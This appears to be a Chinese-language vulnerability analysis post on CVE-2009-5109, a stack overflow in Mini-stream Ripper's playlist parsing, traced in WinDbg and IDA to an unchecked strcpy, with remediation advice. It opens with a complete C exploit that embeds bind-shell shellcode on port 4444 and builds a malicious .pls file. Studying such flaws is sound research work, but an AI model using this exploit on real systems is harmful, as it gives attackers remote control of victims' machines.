
Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)

2017-02-20

Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)。

Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)。

漏洞说明 软件下载: https://www.exploit-db.com/apps/ff609955485ea7bd71d403c330a946aa-Mini-streamRipper.exe PoC: #include #include #include /* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum http://metasploit.com */ unsigned char shell[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49""\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36""\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34""\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41""\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e""\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58""\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47""\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58""\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38""\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a""\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30""\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57""\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58""\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30""\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c""\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44""\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50""\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f""\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33""\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f""\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f""\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50""\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d""\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45""\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f""\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38""\x41\x4e\x45\x49\x4a\x46\x46\x4a
\x4c\x51\x42\x57\x47\x4c\x47\x55""\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d""\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d""\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38""\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35""\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37""\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56""\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56""\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54""\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54""\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53""\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51""\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35""\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35""\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c""\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f""\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f""\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e""\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"; int main ( int argc , char * argv[]){ FILE* expfle= NULL; char* EIP = "\x53\x93\x42\x7e"; // jmp esp -> user32.dll int i; printf("\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\r\n"); printf("\t -------> now upload the .pls file to a remote server <-------\n");

if( (expfle=fopen("mini-stream-ripper.pls","wb")) ==NULL ) { perror("Cannot create the exploit file!!! :("); exit(0); } for (i=0; i<17405; i++) { fwrite("\x41", 1, 1, expfle); // Junk } fwrite(EIP, 4, 1, expfle); // ret for (i=0; i<10; i++) { fwrite("\x90", 1, 1, expfle); // Nop&#39;s } fwrite(shell, sizeof(shell), 1, expfle); // write the shell for (i=0; i<16702; i++) { fwrite("\xcc", 1, 1, expfle); // finish off buffer } fclose(expfle); printf("[+] mini-stream-ripper.pls Created successfully! \r\n"); printf("[+] Exploited by mr_me \r\n"); return 0; }调试环境: Windows xp sp3 这个PoC是C语言的,可以用VC6.0进行编译,同样会生成一个.pls文件,然后直接用Mini-stream RIPPER打开,就能够触发漏洞了,不过这个PoC包含shellcode,如果想正常引发crash的话,可以把相关的跳转,shellcode等部分的内容直接修改成畸形字符串,比如"\x41"即可。 漏洞复现 此漏洞是由于Ripper.exe对于.pls文件处理时,没有对文件内容的长度进行长度检查,从而在MSRfilter01.dll中处理文件时拷贝了异常字符串,导致了缓冲区溢出,当使用函数sub_42B840时,由于超长字符串覆盖了缓冲区,从而导致了漏洞的发生。 我们生成一个样本文件,打开ripper.exe,加载样本文件,附加windbg,到达漏洞现场。 0:010> g(304.e0): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0001021690909090 ?? ???这时我们使用kb回溯堆栈调用。 0:000> kbChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. 
Following frames may be wrong.
000f7294 90909090 90909090 90909090 41909090 0x90909090
000fbfb4 00000000 00000000 00000000 00000000 0x90909090

发现此时堆栈已经被完全破坏了,无法通过堆栈回溯定位漏洞现场。我们重新观察PoC:程序打开样本文件时应该会调用fopen,于是通过IDA Pro查找关键函数fopen的引用,得到下面四处调用。

.text:0045B6F7 call ds:fopen
.text:00446E37 call ds:fopen
.text:00446232 call ds:fopen
.text:00429636 call ds:fopen

漏洞分析

我们在这四处调用下断点。

0:010> bp 0045B6F7
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
0:010> bp 00446E37
0:010> bp 00446232
0:010> bp 00429636

重新加载程序并打开样本后,程序在其中一处fopen断点中断;为了确认是哪一处调用与漏洞相关,我们直接继续运行,发现随后到达了漏洞位置。

0:010> bl 0 e 0045b6f7 0001 (0001) 0:**** Ripper+0x5b6f7 1 e 00446e37 0001 (0001) 0:**** Ripper+0x46e37 2 e 00446232 0001 (0001) 0:**** Ripper+0x46232 3 e 00429636 0001 (0001) 0:**** Ripper+0x296360:010> gBreakpoint 3 hiteax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x29636:*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 00429636 ff15d4aa4600 call dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}0:000> g(108.7dc): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0001021690909090 ?? ???因此我们可以确定这处call调用是关键调用,我们重新附加,直接到达这处call fopen调用。 0:010> bp 00429636*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe0:010> gBreakpoint 0 hiteax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x29636:*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 00429636 ff15d4aa4600 call dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}0:000> dd esp000f7290 000fbbd4 0047f794 00000001 00000000这时我们看看fopen的第一个参数 0:000> dc poi(esp)000fbbd4 445c3a43 6d75636f 73746e65 646e6120 C:\Documents and000fbbe4 74655320 676e6974 64415c73 696e696d Settings\Admini000fbbf4 61727473 5c726f74 73617263 702e3268 strator\crash2.p000fbc04 0000736c 00000014 00000001 00000000 ls确实是打开样本文件的操作,接下来,我们进行单步跟进。 0:000> peax=00000001 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3eip=00429856 esp=000f7294 ebp=000fbfb4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206Ripper+0x29856:00429856 e8e51f0000 call Ripper+0x2b840 (0042b840)到达这个位置的时候,单步步过,漏洞被触发,我们查看一下,其实是在这个函数的一个分支逻辑。 mov ecx, ebpmov dword_4BB364, 2call sub_4208E0push ebx ; ArgListmov ecx, ebpcall sub_42B840在进入这个call调用时,我们来查看一下它的参数,首先来看看这个函数定义。 signed int __userpurge sub_42B840(int a1, const char *ArgList)定义了一个指针,和一个整数变量,这个指针实际上是文件路径。 0:000> dd esp000f7294 000fbbd4 000000010:000> dc poi(esp)000fbbd4 445c3a43 6d75636f 73746e65 646e6120 C:\Documents and000fbbe4 74655320 676e6974 64415c73 696e696d Settings\Admini000fbbf4 61727473 5c726f74 73617263 702e3268 strator\crash2.p000fbc04 0000736c 00000014 00000001 00000000 ls我们进入这个函数,单步跟踪,在即将到达ret的时候,我们看到了如下指令,以及内存变化。 eax=00000000 ebx=00000000 ecx=00000461 edx=000008c3 esi=00000001 edi=00f056f8

eip=0042ba8b esp=000ee94c ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba8b:0042ba8b 8b8c2438890000 mov ecx,dword ptr [esp+8938h] ss:0023:000f7284=b87b41410:000> dd esp+8938000f7284 b87b4141 45530146 ffffffff 90909090000f7294 90909090 90909090 90909090 90909090000f72a4 41909090 41414141 41414141 41414141000f72b4 41414141 41414141 41414141 41414141000f72c4 41414141 41414141 41414141 41414141000f72d4 41414141 41414141 41414141 41414141000f72e4 41414141 41414141 41414141 41414141可以看到此时esp对应地址已经被畸形字符串覆盖了,那么接下来。 0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=00f056f8eip=0042ba92 esp=000ee94c ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba92:0042ba92 5f pop edi0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=000066c3eip=0042ba93 esp=000ee950 ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba93:0042ba93 5e pop esi0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba94 esp=000ee954 ebp=00f07a04 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba94:0042ba94 5d pop ebp0:000> peax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba95 esp=000ee958 ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba95:0042ba95 5b pop ebx0:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba96 esp=000ee95c ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba96:0042ba96 64890d00000000 mov dword ptr fs:[0],ecx fs:003b:00000000=000f72840:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042ba9d esp=000ee95c ebp=000fbfb4 
iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2ba9d:0042ba9d 81c434890000 add esp,8934h0:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=0042baa3 esp=000f7290 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216Ripper+0x2baa3:0042baa3 c20400 ret 40:000> peax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0 nv up ei pl nz ac pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0000021690909090 ?? ???连续的pop之后,栈退出,返回后指向了90909090这个地址,可控,从而能达到控制eip执行任意代码的目的。 那么我们需要知道何时栈被畸形字符串覆盖,但是经过分析sub_42B840这个函数内部很大,我们需要快速定位到内存被覆盖的时刻,这样我们可以使用ba命令,在存在问题的位置下断点,首先我们进入这个函数时,可以观察内存空间。 0:000> p

eax=00008928 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3eip=0042b85a esp=000f7284 ebp=000fbfb4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206Ripper+0x2b85a:0042b85a e8f1600300 call Ripper+0x61950 (00461950)0:000> peax=0042b85f ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3eip=0042b85f esp=000ee95c ebp=000fbfb4 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246Ripper+0x2b85f:0042b85f 53 push ebx0:000> dd esp+8938000f7294 000fbbd4 00000001 00000000 7d647c29000f72a4 00a00054 00000000 00000000 00000000000f72b4 00000000 00000000 00000000 00000000000f72c4 00000000 00000000 00000000 00000000000f72d4 00000000 00000000 00000000 00000000000f72e4 00000000 00000000 00000000 00000000000f72f4 00000000 00000000 00000000 00000000000f7304 00000000 00000000 00000000 00000000此时esp对应位置存放的还是传入参数,这样我们在000f7294的位置下内存写入断点。 0:000> ba w1 000f72940:000> bl 0 e 00429856 0001 (0001) 0:**** Ripper+0x29856 1 e 000f7294 w 1 0001 (0001) 0:**** 0:000> gBreakpoint 1 hiteax=00000000 ebx=00000000 ecx=00000033 edx=000066ec esi=02ed3548 edi=000f72a4eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll - MSRfilter01!Playlist_FindNextItem+0x53:1000b5e3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]执行到这一步的时候可以看一下对应位置发生了什么变化。 0:000> peax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x55:1000b5e5 8bca mov ecx,edx0:000> dd 000f7284000f7284 b87b4141 45530146 90905958 90909090000f7294 90909090 90909090 90909090 90909090000f72a4 41909090 41414141 41414141 41414141000f72b4 41414141 41414141 41414141 41414141000f72c4 41414141 41414141 41414141 41414141000f72d4 41414141 41414141 41414141 41414141000f72e4 41414141 41414141 41414141 41414141那么可以看到此时内存已经被覆盖了,那么我们需要再次回溯,看看000f7294到底是什么原因被修改的。 这个函数处于MSRfilter01.dll中,我们重新来看一下这个函数的过程。 signed int __cdecl Playlist_FindNextItem(char *a1){ const char *v1; // eax@1 signed int result; // eax@2 sub_1000B630( 5, "Debug: Playlist_FindNextItem enter. %s(%u)", (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c"); v1 = (const char *)sub_10008CC0(dword_10063BA0, 1); if ( v1 ) { strcpy(a1, v1); sub_1000B630( 5, "Debug: Playlist_FindNextItem ok. %s(%u)", (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c"); result = 1; } else { sub_1000B630( 5, "Debug: Playlist_FindNextItem NO File return. %s(%u)", (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");

result = 0; } return result;}

可以看到,v1即eax,而eax正是存放指向畸形字符串的指针的寄存器:sub_10008CC0返回该指针,随后strcpy将v1拷贝到a1所指的栈缓冲区中。正是这一步没有对v1的长度做任何检查,也没有以a1缓冲区的大小作为拷贝上限,导致超长字符串拷入时冲垮了下方栈中的内容(其中包括调用者sub_42B840的返回地址)。从修复角度看,应在拷贝前校验播放列表条目的长度,并改用以目标缓冲区大小为界的拷贝,同时保证结尾的'\0'。

这一步可以看到eax经过call函数调用后会被赋予异常串的值

0:010> g
Breakpoint 0 hit
eax=00ee0878 ebx=00000000 ecx=7c93003d edx=00000020 esi=000fbc07 edi=000f50b7
eip=1000b5ae esp=000ee92c ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
MSRfilter01!Playlist_FindNextItem+0x1e:
1000b5ae e80dd7ffff call MSRfilter01+0x8cc0 (10008cc0)
0:000> dd 000f7284
000f7284 000fbd48 004650db ffffffff 0042985b
000f7294 000fbbd4 00000001 00000000 7d647c29
000f72a4 00a00054 00000000 00000000 00000000
000f72b4 00000000 00000000 00000000 00000000
000f72c4 00000000 00000000 00000000 00000000
000f72d4 00000000 00000000 00000000 00000000
000f72e4 00000000 00000000 00000000 00000000
000f72f4 00000000 00000000 00000000 00000000
0:000> p
eax=02eccf28 ebx=00000000 ecx=00ee08c0 edx=00000000 esi=000fbc07 edi=000f50b7
eip=1000b5b3 esp=000ee92c ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
MSRfilter01!Playlist_FindNextItem+0x23:
1000b5b3 83c418 add esp,18h

紧接着拷贝,造成栈被冲垮。

0:000> p
eax=00000000 ebx=00000000 ecx=000019bb edx=000066ec esi=02eccf28 edi=000f0c84
eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
MSRfilter01!Playlist_FindNextItem+0x53:
1000b5e3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd 000f7284
000f7284 000fbd48 004650db ffffffff 0042985b
000f7294 000fbbd4 00000001 00000000 7d647c29
000f72a4 00a00054 00000000 00000000 00000000
000f72b4 00000000 00000000 00000000 00000000
000f72c4 00000000 00000000 00000000 00000000
000f72d4 00000000 00000000 00000000 00000000
000f72e4 00000000 00000000 00000000 00000000
000f72f4 00000000 00000000 00000000 00000000
0:000> p
eax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370
eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0 nv up ei pl nz na pe nc
cs=001b 
ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206MSRfilter01!Playlist_FindNextItem+0x55:1000b5e5 8bca mov ecx,edx0:000> dd 000f7284000f7284 b87b4141 45530146 90905958 90909090000f7294 90909090 90909090 90909090 90909090000f72a4 41909090 41414141 41414141 41414141000f72b4 41414141 41414141 41414141 41414141000f72c4 41414141 41414141 41414141 41414141
